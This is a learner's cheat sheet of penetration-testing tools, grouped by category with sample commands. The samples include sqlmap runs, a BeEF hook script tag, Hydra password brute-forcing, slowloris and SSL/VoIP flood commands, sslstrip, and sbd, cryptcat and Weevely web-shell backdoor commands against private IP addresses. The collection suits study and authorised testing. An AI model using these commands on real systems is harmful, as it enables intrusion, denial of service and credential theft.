Tools for Penetration Testing

Over a course of time learning, i compiled a list of different tools used penetration testing and ethical hacking.

Database Tools Usage

1. sqlmap

automates the process of detecting
and exploiting SQL injection flaws and taking over of database servers

sqlmap –u victim_url
sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686;rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3

CMS Scanning Tools

1. WPScan

wpscan --version
wpscan –u URL of webpage”.

1. Joomscan

joomscan –h
joomscan –-version
joomscan /?
joomscan –u victim_url

SSL Scanning Tools

1. TLSSLed

tlssled URL port

1. w3af

www audi framework

• start

w3af

• enter the URL of victim
• start

Exploitation Tools

1. Metasploit

msfupdate
msf > search name:Microsoft type:exploit.

1. Armitage

MetaGUI

1. BeEF

beef-xss

username and password: beef.

<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>

1. Linux Exploit Suggester

root@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

Forensics Tools

1. p0f identify the operating system of a target host simply by examining captured packets

In the hands of advanced users, P0f can detect firewall
presence, NAT use, and existence of load balancers.

p0f –-version
p0f -h

p0f –i eth0 –p -o filename

• open 192.168.1.2

1. pdf-parser

parses a PDF document to identify the fundamental elements used
in the analyzed pdf

pdf-parser -o 10 filepath

1. dumpzilla

extract all forensic

interesting information of Firefox, Iceweasel, and Seamonkey browsers

1. ddrescue

copies data from one file or block device (hard disc, cdrom, etc.) to another, trying to
rescue the good parts first in case of read errors.

dd_rescue infilepath outfilepath

dd_rescue -v /dev/sdb ~/sec.img

1. DFF

dff-gui

Social Engineering

1. Social Engineering Toolkit

sudo apt install sendmail
vim config/set_config
# SENDMAIL=OFF flag to SENDMAIL=ON.

Stressing Tools

DoS attacks or to create the stress test for different
applications so as take appropriate measures for the future.

1. Slowhttptest

slowhttptest --version
slowhttptest -h


# sampel
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u http://192.168.1.202/index.php -x 24 -p 2

Where,
(-c 500) = 500 connections
(-H) = Slowloris mode
-g = Generate statistics
-o outputfile = Output file name
-i 10 = Use 10 seconds to wait for data
-r 200 = 200 connections with -t GET = GET requests
-u http://192.168.1.202/index.php = target URL-x 24 = maximum of length of 24 bytes
-p 2 = 2-second timeout

1. Inviteflood

SIP/SDP INVITE message flooding over UDP/IP.

inviteflood --version

# format
inviteflood eth0 target_extension target_domain target_ip number_of_packets

# sample
inviteflood eth0 2000 192.168.x.x 192.168.x.x 1

Where,
target_extension is 2000
target_domain is 192.168.x.x
target_ip is 192.168.x.x
number_of_packets is 1
-a is alias of SIP account

1. Iaxflood

VoIP DoS tool

iaxflood –-version
iaxflood –h

iaxflood sourcename destinationname numpackets
iaxflood ip_src ip_dest packets

1. thc-ssl-dos

verify the performance of SSL
Establishing a secure SSL connection requires 15x more processing power on the server than on the client.

# format
thc-ssl-dos victimIP httpsport –accept
# examp
thc-ssl-dos 192.168.1.1 443 –accept

Sniffing & Spoofing

1. Burpsuite

sniffing tool between your browser and the webservers to find
the parameters that the web application uses

1. mitmproxy

SSL-capable man-in-the-middle HTTP proxy.

mitmproxy –-version
mitmproxy –h
mitmproxy –p portnumber
mitmproxy –p 80

1. Wireshark

2. sslstrip

MITM attack that forces a victim's browser to communicate in plain-text over HTTP

sslstrip --version
sslstrip -h
sslstrip -p 80

Password Cracking Tools

1. Hydra

login cracker that supports many protocols to attack

hydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V

1. Johnny

GUI for the John the Ripper password cracking tool

1. John

CLI for Johnny GUI.

unshadow passwd shadow > unshadowed.txt

1. Rainbowcrack cracks hashes by rainbow table lookup.

rcrack -h

rcrack path_to_rainbow_tables -f path_to_password_hash
rcrack path_to_rainbow_tables -f path_to_password_hash
./rcrack . -h 5d41402abc4b2a76b9719d911017c592
./rcrack . -l hash.txt

1. SQLdict

dictionary attack tool for SQL server

sqldict

• Under “Target IP Server”,
• Under “Target Account”, enter the username.
• load the file with the password
• start

1. hash-identifier

identify types of hashes

hash-identifier 5d41402abc4b2a76b9719d911017c592

Maintaining Access

uses to maintain connection and for access to
a hacked machine even when it connects and disconnects again.

1. Powersploit

help to connect with the victim’s machine via PowerShell.

cd /usr/share/powersploit/

1. Sbd

similar to Netcat
features AES-CBC-128 + HMAC-SHA1 encryption

# server
sbd -l -p 44

# visctim
sbd 192.168.43.2 44

1. Weevely

PHP web shell that simulate telnet-like connection
used as a stealth backdoor

# check
weevely -h

# format
weevely generate password pathoffile
# sample
weevely generate adm1n123 ~/Desktop/about1.php

# formart
weevely URL password
# sample
weevely http://198.168.32.13 adm1n123

1. http-tunnel

creates a bidirectional virtual data stream tunneled in HTTP requests
This can be useful for users behind restrictive firewalls.

# server
httptunnel_server –h

# client
httptunnel_client –h

1. cryptcat

similar to Netcat which allows to make TCP and UDP connection with a victim’s
machine in an encrypted way

# server
cryptcat –l –p port –n

# client
cryptcat IPofServer PortofServer

Reverse Engineering

1. OllyDbg

32-bit assembler level analyzing debugger for MS Windows applications
used to crack the commercial softwares.

• start

ollydbg

1. dex2jar

convert APK file (android) to JAR file in order to view the source code.

d2j-dex2jar –d /file location
d2j-dex2jar –d ~/Desktop/class.dex

1. jd-gui

standalone graphical utility that displays Java source codes of “.class” files.

jd-gui

1. apktool

best tools to reverse the whole android application

apktool
# decompile
apktool d apk file

Reporting Tools

1. Dradis

service dradis start
dradis

• open https://machine_ip:3004
• import files from NMAP, NESSUS, NEXPOSE

1. Metagoofil

search in Google to identify and download the documents to the local
disk and then extracts the metadata

# help
metagoofil -h
metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res

• –d (domain name)
• –t (filetype to download dox,pdf,etc)
• –l (limit the results 10, 100 )–n (limit files to download)
• –o ( location to save the files)
• –f (output file)

Misc

1. strace

# sample
strace –e trace=network,read,write /path/to/app args
# example
strace -e trace=network,read,write customapp